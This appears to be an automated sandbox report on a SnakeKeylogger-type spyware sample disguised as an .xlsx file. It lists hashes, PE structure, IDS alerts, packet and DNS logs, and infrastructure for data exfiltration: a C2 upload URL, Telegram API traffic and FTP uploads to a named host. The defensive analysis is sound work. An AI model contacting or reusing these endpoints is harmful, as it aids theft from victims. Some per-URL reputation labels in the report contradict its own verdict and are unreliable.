                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
                    https://reallyfreegeoip.org/xml/ | DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002480000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
213.189.52.181 | s4.serv00.com | Poland | 57367 | ECO-ATMAN-PLECO-ATMAN-PL | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1474973
Start date and time: 2024-07-17 14:16:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DC74433Y7889021.xlsx.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@4/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 110
• Number of non-executed functions: 19
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: DC74433Y7889021.xlsx.exe
Time | Type | Description
08:17:00 | API Interceptor | 5612498x Sleep call for process: DC74433Y7889021.xlsx.exe modified
Process: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.5283500998100426
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:DC74433Y7889021.xlsx.exe
                                                    File size:739'328 bytes
                                                    MD5:6fd5c95f3bc8ac876f1babed1b839dcd
                                                    SHA1:b35d7e77ac643ab5d9bbe7442553aa82ac1379c3
                                                    SHA256:d1fcbf364ad31af81a9612d9633e1b6598375983354390bfaa32b5ea5a7c3a6d
                                                    SHA512:13215e1e1252953b6db6e4a13c9ae438579e3873eb780ef5038d9d32a4452812e9e5b29f4ad24033c30310d621d86077ec937a1805497be74c5181b99f8019cd
                                                    SSDEEP:12288:c4ndmoie6MfHpYRK7raPRJeoqN0N40AxLqA:pngpe6m2R3PPeoqN0N4Jq
                                                    TLSH:F5F4C01A2A60C879ED3D95B6F4E3402D2B307D4225E2E93714CE3E8C6AF9B5145C726F
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.................0......Z........... ... ....@.. ....................................@................................
                                                    Icon Hash:31d89a929298d027
                                                    Entrypoint:0x4b0a1e
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0xA8818C66 [Sat Aug 2 15:06:14 2059 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al (this instruction repeats for the remaining 97 lines: the bytes following the entry-point jump are zero padding, and 00 00 disassembles as add byte ptr [eax], al)
                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb09d0 | 0x4b | .text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb2000 | 0x5784 | .rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb8000 | 0xc | .reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                    .text | 0x2000 | 0xaea24 | 0xaec00 | 3c7fd4febadd7a7074945aa39170fd62 | False | 0.5529900415772532 | data | 7.549042885897216 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc | 0xb2000 | 0x5784 | 0x5800 | 9701a292d950693b5a538d03eface908 | False | 0.30854936079545453 | data | 5.307373461337928 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc | 0xb8000 | 0xc | 0x200 | 843f732a168a539c2232216f4ca11900 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                    RT_ICON | 0xb21f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | - | - | 0.4920212765957447
                                                    RT_ICON | 0xb2658 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | - | - | 0.32704918032786884
                                                    RT_ICON | 0xb2fe0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | - | - | 0.2303001876172608
                                                    RT_ICON | 0xb4088 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | - | - | 0.15995850622406638
                                                    RT_ICON | 0xb6630 | 0xc1d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | - | - | 0.8742341180264431
                                                    RT_GROUP_ICON | 0xb7250 | 0x4c | data | - | - | 0.75
                                                    RT_VERSION | 0xb729c | 0x2fc | data | - | - | 0.4397905759162304
                                                    RT_MANIFEST | 0xb7598 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | - | - | 0.5489795918367347
                                                    DLL | Import
                                                    mscoree.dll | _CorExeMain
                                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                    07/17/24-14:17:22.648999 | TCP | 2845532 | ETPRO TROJAN SnakeKeylogger Exfil via FTP M1 | 49756 | 21 | 192.168.2.4 | 213.189.52.181
                                                    Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                                                    2024-07-17T14:17:08.911771+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49742 | 443 | 192.168.2.4 | 188.114.97.3
                                                    2024-07-17T14:19:21.508196+0200 | TCP | 2845532 | ETPRO MALWARE SnakeKeylogger Exfil via FTP M1 | 49756 | 21 | 192.168.2.4 | 213.189.52.181
                                                    2024-07-17T14:17:11.365188+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49747 | 443 | 192.168.2.4 | 188.114.97.3
                                                    2024-07-17T14:17:05.037579+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49730 | 80 | 192.168.2.4 | 193.122.130.0
                                                    2024-07-17T14:17:58.639130+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49763 | 20.114.59.183 | 192.168.2.4
                                                    2024-07-17T14:17:20.554901+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49753 | 20.114.59.183 | 192.168.2.4
                                                    2024-07-17T14:17:05.614505+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49735 | 443 | 192.168.2.4 | 188.114.97.3
                                                    2024-07-17T14:17:06.146860+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49736 | 80 | 192.168.2.4 | 193.122.130.0
                                                    Jul 17, 2024 14:17:11.365185022 CEST44349747188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:11.365638971 CEST44349747188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:11.365822077 CEST49747443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:11.367938995 CEST49747443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:11.373411894 CEST4974680192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:11.374238968 CEST4974880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:11.379071951 CEST8049746193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:11.379116058 CEST8049748193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:11.379122019 CEST4974680192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:11.379170895 CEST4974880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:11.379313946 CEST4974880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:11.384105921 CEST8049748193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:11.837635994 CEST8049748193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:11.839603901 CEST49749443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:11.839659929 CEST44349749188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:11.839741945 CEST49749443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:11.840069056 CEST49749443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:11.840087891 CEST44349749188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:11.881146908 CEST4974880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:12.305113077 CEST44349749188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:12.307115078 CEST49749443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:12.307157040 CEST44349749188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:12.452521086 CEST44349749188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:12.452630997 CEST44349749188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:12.452735901 CEST49749443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:12.453497887 CEST49749443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:12.456985950 CEST4974880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:12.458267927 CEST4975080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:12.462640047 CEST8049748193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:12.462734938 CEST4974880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:12.463455915 CEST8049750193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:12.463535070 CEST4975080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:12.463634014 CEST4975080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:12.468437910 CEST8049750193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:13.264460087 CEST8049750193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:13.265459061 CEST8049750193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:13.265676975 CEST4975080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:13.266202927 CEST49751443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:13.266259909 CEST44349751188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:13.266345978 CEST49751443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:13.266648054 CEST49751443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:13.266663074 CEST44349751188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:13.758335114 CEST44349751188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:13.760550976 CEST49751443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:13.760587931 CEST44349751188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:13.910722971 CEST44349751188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:13.910816908 CEST44349751188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:13.910861015 CEST49751443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:13.911417961 CEST49751443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:13.927018881 CEST4975080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:13.933034897 CEST8049750193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:13.933100939 CEST4975080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:13.935486078 CEST49752443192.168.2.4149.154.167.220
                                                    Jul 17, 2024 14:17:13.935513020 CEST44349752149.154.167.220192.168.2.4
                                                    Jul 17, 2024 14:17:13.935566902 CEST49752443192.168.2.4149.154.167.220
                                                    Jul 17, 2024 14:17:13.936093092 CEST49752443192.168.2.4149.154.167.220
                                                    Jul 17, 2024 14:17:13.936106920 CEST44349752149.154.167.220192.168.2.4
                                                    Jul 17, 2024 14:17:14.575814009 CEST44349752149.154.167.220192.168.2.4
                                                    Jul 17, 2024 14:17:14.575896978 CEST49752443192.168.2.4149.154.167.220
                                                    Jul 17, 2024 14:17:14.578023911 CEST49752443192.168.2.4149.154.167.220
                                                    Jul 17, 2024 14:17:14.578042030 CEST44349752149.154.167.220192.168.2.4
                                                    Jul 17, 2024 14:17:14.578269958 CEST44349752149.154.167.220192.168.2.4
                                                    Jul 17, 2024 14:17:14.580357075 CEST49752443192.168.2.4149.154.167.220
                                                    Jul 17, 2024 14:17:14.624500990 CEST44349752149.154.167.220192.168.2.4
                                                    Jul 17, 2024 14:17:14.828084946 CEST44349752149.154.167.220192.168.2.4
                                                    Jul 17, 2024 14:17:14.828263998 CEST44349752149.154.167.220192.168.2.4
                                                    Jul 17, 2024 14:17:14.828496933 CEST49752443192.168.2.4149.154.167.220
                                                    Jul 17, 2024 14:17:14.833448887 CEST49752443192.168.2.4149.154.167.220
                                                    Jul 17, 2024 14:17:20.212431908 CEST4973680192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:20.438886881 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:20.443698883 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:20.443783998 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:21.064588070 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.064830065 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:21.069911003 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.257766008 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.258104086 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:21.265224934 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.524398088 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.524672985 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:21.529511929 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.714761972 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.714934111 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:21.719718933 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.904567957 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.904773951 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:21.909862995 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:22.450741053 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:22.450953007 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:22.451524973 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:22.451704025 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:22.456768990 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:22.642566919 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:22.643626928 CEST4975964212192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:22.648535013 CEST6421249759213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:22.648895025 CEST4975964212192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:22.648998976 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:22.661417961 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:23.204821110 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:23.209404945 CEST4975964212192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:23.211287022 CEST4975964212192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:23.214360952 CEST6421249759213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:23.216543913 CEST6421249759213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:23.220947027 CEST4975964212192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:23.256294966 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:23.420774937 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:23.474901915 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:24.930371046 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:24.935461044 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.396604061 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.397322893 CEST4976164119192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:25.398139954 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.398219109 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:25.402404070 CEST6411949761213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.402512074 CEST4976164119192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:25.402735949 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:25.407797098 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.970232964 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.973108053 CEST4976164119192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:25.973108053 CEST4976164119192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:25.979491949 CEST6411949761213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.979523897 CEST6411949761213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.979636908 CEST6411949761213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.979664087 CEST6411949761213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.979691982 CEST6411949761213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.979795933 CEST6411949761213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.980603933 CEST6411949761213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.980972052 CEST4976164119192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:26.021910906 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:26.328495979 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:26.381297112 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:27.837539911 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:27.843977928 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:28.034118891 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:28.034774065 CEST4976263014192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:28.039767027 CEST6301449762213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:28.039839983 CEST4976263014192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:28.039921999 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:28.045120001 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:28.701682091 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:28.702104092 CEST4976263014192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:28.702189922 CEST4976263014192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:28.707250118 CEST6301449762213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:28.708431959 CEST6301449762213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:28.708527088 CEST4976263014192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:28.756150961 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:28.901737928 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:28.943676949 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:19:21.508196115 CEST4975621192.168.2.4213.189.52.181
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 17, 2024 14:17:01.783745050 CEST | 60069 | 53 | 192.168.2.4 | 1.1.1.1
Jul 17, 2024 14:17:01.792860031 CEST | 53 | 60069 | 1.1.1.1 | 192.168.2.4
Jul 17, 2024 14:17:03.382081032 CEST | 59360 | 53 | 192.168.2.4 | 1.1.1.1
Jul 17, 2024 14:17:03.389602900 CEST | 53 | 59360 | 1.1.1.1 | 192.168.2.4
Jul 17, 2024 14:17:13.927567005 CEST | 62199 | 53 | 192.168.2.4 | 1.1.1.1
Jul 17, 2024 14:17:13.934848070 CEST | 53 | 62199 | 1.1.1.1 | 192.168.2.4
Jul 17, 2024 14:17:20.426573992 CEST | 58032 | 53 | 192.168.2.4 | 1.1.1.1
Jul 17, 2024 14:17:20.437954903 CEST | 53 | 58032 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 17, 2024 14:17:01.783745050 CEST | 192.168.2.4 | 1.1.1.1 | 0x9506 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 17, 2024 14:17:03.382081032 CEST | 192.168.2.4 | 1.1.1.1 | 0x5c94 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jul 17, 2024 14:17:13.927567005 CEST | 192.168.2.4 | 1.1.1.1 | 0x68e4 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Jul 17, 2024 14:17:20.426573992 CEST | 192.168.2.4 | 1.1.1.1 | 0xfbbf | Standard query (0) | s4.serv00.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 17, 2024 14:17:01.792860031 CEST | 1.1.1.1 | 192.168.2.4 | 0x9506 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jul 17, 2024 14:17:01.792860031 CEST | 1.1.1.1 | 192.168.2.4 | 0x9506 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jul 17, 2024 14:17:01.792860031 CEST | 1.1.1.1 | 192.168.2.4 | 0x9506 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jul 17, 2024 14:17:01.792860031 CEST | 1.1.1.1 | 192.168.2.4 | 0x9506 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jul 17, 2024 14:17:01.792860031 CEST | 1.1.1.1 | 192.168.2.4 | 0x9506 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jul 17, 2024 14:17:01.792860031 CEST | 1.1.1.1 | 192.168.2.4 | 0x9506 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jul 17, 2024 14:17:03.389602900 CEST | 1.1.1.1 | 192.168.2.4 | 0x5c94 | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jul 17, 2024 14:17:03.389602900 CEST | 1.1.1.1 | 192.168.2.4 | 0x5c94 | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
